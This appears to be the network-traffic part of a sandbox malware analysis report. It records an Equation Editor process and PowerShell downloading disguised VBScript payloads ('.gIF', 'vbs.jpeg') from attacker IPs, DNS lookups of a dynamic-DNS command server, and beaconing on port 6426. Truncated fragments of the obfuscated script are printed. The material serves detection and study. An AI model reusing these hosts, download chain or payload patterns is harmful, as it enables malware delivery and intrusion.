                              Jul 29, 2024 16:15:12.514781952 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.514869928 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.514903069 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.514935017 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.514966965 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.515012026 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.515044928 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.515084982 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.515084982 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.515084982 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.515095949 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.515136957 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.515146971 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.515180111 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.515187979 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.515213013 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.515242100 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.515252113 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.515285015 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.515311003 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.515438080 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.515470028 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.515490055 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.515501976 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.515533924 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.515552044 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.515566111 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.515598059 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.515614033 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.515630960 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.515678883 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.515749931 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.515780926 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.515815020 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.515837908 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.515842915 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.515893936 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.515908957 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.515940905 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.515974045 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.515995979 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.516009092 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.516062021 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.516206026 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.516237020 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.516268969 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.516288042 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.516300917 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.516333103 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.516351938 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.516382933 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.516415119 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.516433954 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.516448021 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.516479969 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.516509056 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.516577005 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.516612053 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.516629934 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.516731977 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.516746998 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.516777039 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.516777039 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.516810894 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.516827106 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.516843081 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.516874075 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.516889095 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.516906977 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.516940117 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.516958952 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.516985893 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.517018080 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.517047882 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.517050982 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.517082930 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.517102003 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.517117977 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.517169952 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.517498016 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.517529964 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.517563105 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.517582893 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.517596006 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.517628908 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.517646074 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.517661095 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.517693043 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.517714024 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.517730951 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.517761946 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.517780066 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.517793894 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.517827034 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.517844915 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.517858028 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.517890930 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.517908096 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.517921925 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.517955065 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.517972946 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.517987013 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.518019915 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.518033981 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.518306971 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.518340111 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.518361092 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.518372059 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.518404007 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.518421888 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.518471003 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.518503904 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.518521070 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.518537045 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.518568039 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.518583059 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.518600941 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.518634081 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.518651962 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.518665075 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.518697023 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.518719912 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.518731117 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.518764019 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.518784046 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.518795967 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.518830061 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.518845081 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.518865108 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.518914938 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.519196033 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.519227982 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.519260883 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.519280910 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.519294024 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.519325972 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.519340992 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.519359112 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.519391060 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.519409895 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.519423008 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.519455910 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.519476891 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.519488096 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.519540071 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.626466990 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.626918077 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:12.697204113 CEST491666426192.168.2.22103.253.17.222
                              Jul 29, 2024 16:15:12.702682972 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:15:12.702837944 CEST491666426192.168.2.22103.253.17.222
                              Jul 29, 2024 16:15:12.710750103 CEST491666426192.168.2.22103.253.17.222
                              Jul 29, 2024 16:15:12.715809107 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:15:13.644160986 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:15:13.845947981 CEST491666426192.168.2.22103.253.17.222
                              Jul 29, 2024 16:15:13.936507940 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:15:13.947000980 CEST491666426192.168.2.22103.253.17.222
                              Jul 29, 2024 16:15:13.951991081 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:15:13.952033997 CEST491666426192.168.2.22103.253.17.222
                              Jul 29, 2024 16:15:13.956929922 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:15:14.889182091 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:15:14.890937090 CEST491666426192.168.2.22103.253.17.222
                              Jul 29, 2024 16:15:14.895823956 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:15:15.187412977 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:15:15.239729881 CEST4916780192.168.2.22178.237.33.50
                              Jul 29, 2024 16:15:15.244770050 CEST8049167178.237.33.50192.168.2.22
                              Jul 29, 2024 16:15:15.244889021 CEST4916780192.168.2.22178.237.33.50
                              Jul 29, 2024 16:15:15.245279074 CEST4916780192.168.2.22178.237.33.50
                              Jul 29, 2024 16:15:15.252089977 CEST8049167178.237.33.50192.168.2.22
                              Jul 29, 2024 16:15:15.390436888 CEST491666426192.168.2.22103.253.17.222
                              Jul 29, 2024 16:15:15.887590885 CEST8049167178.237.33.50192.168.2.22
                              Jul 29, 2024 16:15:15.887716055 CEST4916780192.168.2.22178.237.33.50
                              Jul 29, 2024 16:15:15.899116039 CEST491666426192.168.2.22103.253.17.222
                              Jul 29, 2024 16:15:15.904051065 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:15:16.888991117 CEST8049167178.237.33.50192.168.2.22
                              Jul 29, 2024 16:15:16.889173031 CEST4916780192.168.2.22178.237.33.50
                              Jul 29, 2024 16:15:22.792254925 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:15:22.794478893 CEST491666426192.168.2.22103.253.17.222
                              Jul 29, 2024 16:15:22.800040960 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:15:52.804316044 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:15:52.806401968 CEST491666426192.168.2.22103.253.17.222
                              Jul 29, 2024 16:15:52.811561108 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:16:17.574754000 CEST4916780192.168.2.22178.237.33.50
                              Jul 29, 2024 16:16:17.915546894 CEST4916780192.168.2.22178.237.33.50
                              Jul 29, 2024 16:16:18.617374897 CEST4916780192.168.2.22178.237.33.50
                              Jul 29, 2024 16:16:19.818551064 CEST4916780192.168.2.22178.237.33.50
                              Jul 29, 2024 16:16:22.220948935 CEST4916780192.168.2.22178.237.33.50
                              Jul 29, 2024 16:16:23.121036053 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:16:23.129336119 CEST491666426192.168.2.22103.253.17.222
                              Jul 29, 2024 16:16:23.131346941 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:16:23.131426096 CEST491666426192.168.2.22103.253.17.222
                              Jul 29, 2024 16:16:23.137985945 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:16:27.119366884 CEST4916780192.168.2.22178.237.33.50
                              Jul 29, 2024 16:16:36.713396072 CEST4916780192.168.2.22178.237.33.50
                              Jul 29, 2024 16:16:52.820111036 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:16:52.821603060 CEST491666426192.168.2.22103.253.17.222
                              Jul 29, 2024 16:16:52.826647043 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:17:22.835767031 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:17:22.837301016 CEST491666426192.168.2.22103.253.17.222
                              Jul 29, 2024 16:17:22.842552900 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:17:52.851336956 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:17:52.853044987 CEST491666426192.168.2.22103.253.17.222
                              Jul 29, 2024 16:17:52.857851982 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:18:22.862080097 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:18:22.863529921 CEST491666426192.168.2.22103.253.17.222
                              Jul 29, 2024 16:18:22.868777990 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:18:52.877614021 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:18:52.888017893 CEST491666426192.168.2.22103.253.17.222
                              Jul 29, 2024 16:18:52.893176079 CEST642649166103.253.17.222192.168.2.22
                              Jul 29, 2024 16:19:22.876893997 CEST642649166103.253.17.222192.168.2.22

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Jul 29, 2024 16:15:12.685087919 CEST5456253192.168.2.228.8.8.8
                              Jul 29, 2024 16:15:12.695017099 CEST53545628.8.8.8192.168.2.22
                              Jul 29, 2024 16:15:15.226424932 CEST5291753192.168.2.228.8.8.8
                              Jul 29, 2024 16:15:15.236540079 CEST53529178.8.8.8192.168.2.22

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Jul 29, 2024 16:15:12.685087919 CEST192.168.2.228.8.8.80xb2adStandard query (0)tochisglobal.ddns.netA (IP address)IN (0x0001)false
                              Jul 29, 2024 16:15:15.226424932 CEST192.168.2.228.8.8.80xe3d2Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Jul 29, 2024 16:15:12.695017099 CEST8.8.8.8192.168.2.220xb2adNo error (0)tochisglobal.ddns.net103.253.17.222A (IP address)IN (0x0001)false
                              Jul 29, 2024 16:15:15.236540079 CEST8.8.8.8192.168.2.220xe3d2No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • 172.245.123.11
                              • 198.46.176.133
                              • geoplugin.net

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.2249163172.245.123.11802644C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                              TimestampBytes transferredDirectionData
                              Jul 29, 2024 16:15:04.061233044 CEST339OUTGET /47/weseethesimplethingsalwaystoget.gIF HTTP/1.1
                              Accept: */*
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                              Host: 172.245.123.11
                              Connection: Keep-Alive
                              Jul 29, 2024 16:15:04.599836111 CEST1236INHTTP/1.1 200 OK
                              Date: Mon, 29 Jul 2024 14:15:04 GMT
                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                              Last-Modified: Mon, 29 Jul 2024 05:52:19 GMT
                              ETag: "6550e-61e5c76cdc3cd"
                              Accept-Ranges: bytes
                              Content-Length: 414990
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: image/gif
                              Data Raw: ff fe 64 00 69 00 6d 00 20 00 69 00 6c 00 6c 00 61 00 63 00 65 00 72 00 61 00 64 00 6f 00 45 00 45 00 20 00 0d 00 0a 00 69 00 6c 00 6c 00 61 00 63 00 65 00 72 00 61 00 64 00 6f 00 45 00 20 00 3d 00 20 00 72 00 61 00 6e 00 69 00 6e 00 6f 00 0d 00 0a 00 0d 00 0a 00 61 00 6e 00 61 00 64 00 61 00 72 00 28 00 22 00 4c 00 5f 00 48 00 65 00 6c 00 70 00 41 00 6c 00 69 00 61 00 73 00 5f 00 30 00 30 00 31 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 69 00 6c 00 6c 00 61 00 63 00 65 00 72 00 61 00 64 00 6f 00 45 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 61 00 6e 00 61 00 64 00 61 00 72 00 28 00 22 00 4c 00 5f 00 48 00 65 00 6c 00 70 00 41 00 6c 00 69 00 61 00 73 00 5f 00 30 00 30 00 32 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 69 00 6c 00 6c 00 61 00 63 00 65 00 72 00 61 00 64 00 6f 00 45 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 61 00 6e 00 61 00 64 00 61 00 72 00 28 00 22 00 4c 00 5f 00 48 00 65 00 6c 00 70 00 41 00 [TRUNCATED]
                              Data Ascii: dim illaceradoEE illaceradoE = raninoanadar("L_HelpAlias_001_0_Message") & illaceradoE & _anadar("L_HelpAlias_002_0_Message") & illaceradoE & _anadar("L_HelpAlias_003_0_Message") & illaceradoE & _anadar("X_HelpAlias_004_0_Message") & illaceradoE & _anadar("X_HelpAlias_005_0_Message") & illaceradoE & _anadar("X_HelpAlias_006_0_Message") & illaceradoE & _anadar("X_HelpAlias_007_0_Message") & illaceradoE & _anadar("X_HelpAlias_008_0_Messag
                              Jul 29, 2024 16:15:04.599891901 CEST1236INData Raw: 65 00 22 00 29 00 20 00 26 00 20 00 69 00 6c 00 6c 00 61 00 63 00 65 00 72 00 61 00 64 00 6f 00 45 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 61 00 6e 00 61 00 64 00 61 00 72 00 28 00 22 00 58 00 5f 00 48 00 65 00 6c 00 70 00 41 00 6c 00 69 00 61 00
                              Data Ascii: e") & illaceradoE & _anadar("X_HelpAlias_009_0_Message") & illaceradoE & _anadar("L_HelpAlias_010_0_Message") & illace
                              Jul 29, 2024 16:15:04.599929094 CEST1236INData Raw: 22 00 4c 00 5f 00 48 00 65 00 6c 00 70 00 41 00 6c 00 69 00 61 00 73 00 5f 00 30 00 30 00 32 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 65 00 69 00 6c 00 6c 00 61 00 63 00 65 00 72 00 61 00 64 00
                              Data Ascii: "L_HelpAlias_002_0_Message") & eillaceradoE & _anadar("L_HelpAlias_003_0_Message") & eillaceradoE & _anadar("X_HelpAli
                              Jul 29, 2024 16:15:04.599967957 CEST1236INData Raw: 5f 00 48 00 65 00 6c 00 70 00 41 00 6c 00 69 00 61 00 73 00 5f 00 30 00 31 00 33 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 65 00 69 00 6c 00 6c 00 61 00 63 00 65 00 72 00 61 00 64 00 6f 00 45 00
                              Data Ascii: _HelpAlias_013_0_Message") & eillaceradoE & _anadar("L_HelpAlias_014_0_Message") & eillaceradoE & _anadar("X_HelpAlias
                              Jul 29, 2024 16:15:04.600589037 CEST896INData Raw: 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 6f 00 65 00 69 00 6c 00 6c 00 61 00 63 00 65 00 72 00 61 00 64 00 6f 00 45 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 61 00 6e 00 61 00 64 00 61 00 72 00 28 00
                              Data Ascii: _0_Message") & oeillaceradoE & _anadar("X_HelpAlias_007_0_Message") & oeillaceradoE & _anadar("X_HelpAlias_008_0_Messa
                              Jul 29, 2024 16:15:04.600625038 CEST1236INData Raw: 6c 00 69 00 61 00 73 00 5f 00 30 00 31 00 34 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 6f 00 65 00 69 00 6c 00 6c 00 61 00 63 00 65 00 72 00 61 00 64 00 6f 00 45 00 20 00 26 00 20 00 5f 00 0d 00
                              Data Ascii: lias_014_0_Message") & oeillaceradoE & _anadar("X_HelpAlias_015_0_Message") & oeillaceradoE & _anadar("varioloso") & o
                              Jul 29, 2024 16:15:04.601351023 CEST1236INData Raw: 6c 00 6c 00 6f 00 77 00 65 00 64 00 20 00 77 00 69 00 74 00 68 00 20 00 74 00 68 00 65 00 20 00 67 00 69 00 76 00 65 00 6e 00 20 00 6f 00 70 00 65 00 72 00 61 00 74 00 69 00 6f 00 6e 00 3a 00 20 00 22 00 0d 00 0a 00 70 00 72 00 69 00 76 00 61 00
                              Data Ascii: llowed with the given operation: "private const L_UNKOPT_ErrorMessage = "Unknown switch: "private const L_BLANKOPT
                              Jul 29, 2024 16:15:04.601386070 CEST1236INData Raw: 65 00 78 00 70 00 65 00 63 00 74 00 65 00 64 00 20 00 6d 00 61 00 74 00 63 00 68 00 20 00 63 00 6f 00 75 00 6e 00 74 00 20 00 2d 00 20 00 6f 00 6e 00 65 00 20 00 6d 00 61 00 74 00 63 00 68 00 20 00 69 00 73 00 20 00 65 00 78 00 70 00 65 00 63 00
                              Data Ascii: expected match count - one match is expected: "private const L_OPTNOTUNQ_Message = "Option is not unique: "priva
                              Jul 29, 2024 16:15:04.602062941 CEST1236INData Raw: 74 00 20 00 4c 00 5f 00 4e 00 4f 00 4c 00 41 00 53 00 54 00 54 00 4f 00 4b 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 22 00 49 00 6e 00 76 00 61 00 6c 00 69 00 64 00 20 00 55 00 52 00
                              Data Ascii: t L_NOLASTTOK_Message = "Invalid URI - cannot locate last token for root node name"private const L_HashSyntax_Erro
                              Jul 29, 2024 16:15:04.602098942 CEST896INData Raw: 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 20 00 20 00 20 00 20 00 3d 00 20 00 22 00 49 00 6e 00 76 00 61 00 6c 00 69 00 64 00 20 00 6f 00 70 00 74 00 69 00 6f 00 6e 00 20 00 66 00 6f 00 72 00 20 00 2d 00 66 00 6f 00 72 00 6d 00 61 00 74 00 3a 00
                              Data Ascii: Message = "Invalid option for -format: "private const L_FORMATFAILED_Message = "Unable to reformat message. Raw, u
                              Jul 29, 2024 16:15:04.602133036 CEST1236INData Raw: 6e 00 20 00 40 00 7b 00 2e 00 2e 00 2e 00 7d 00 3a 00 20 00 22 00 0d 00 0a 00 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00 5f 00 50 00 55 00 54 00 5f 00 50 00 41 00 52 00 41 00 4d 00 5f 00 4e 00 4f 00
                              Data Ascii: n @{...}: "private const L_PUT_PARAM_NOTATTR_Message = "Parameter matches a non-text property on resource: "private co


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.2249164198.46.176.133803076C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              TimestampBytes transferredDirectionData
                              Jul 29, 2024 16:15:07.941452026 CEST79OUTGET /Upload/vbs.jpeg HTTP/1.1
                              Host: 198.46.176.133
                              Connection: Keep-Alive
                              Jul 29, 2024 16:15:08.442563057 CEST1236INHTTP/1.1 200 OK
                              Date: Mon, 29 Jul 2024 14:15:08 GMT
                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                              Last-Modified: Wed, 10 Jul 2024 11:19:54 GMT
                              ETag: "1d7285-61ce2d35c4b0c"
                              Accept-Ranges: bytes
                              Content-Length: 1929861
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: image/jpeg
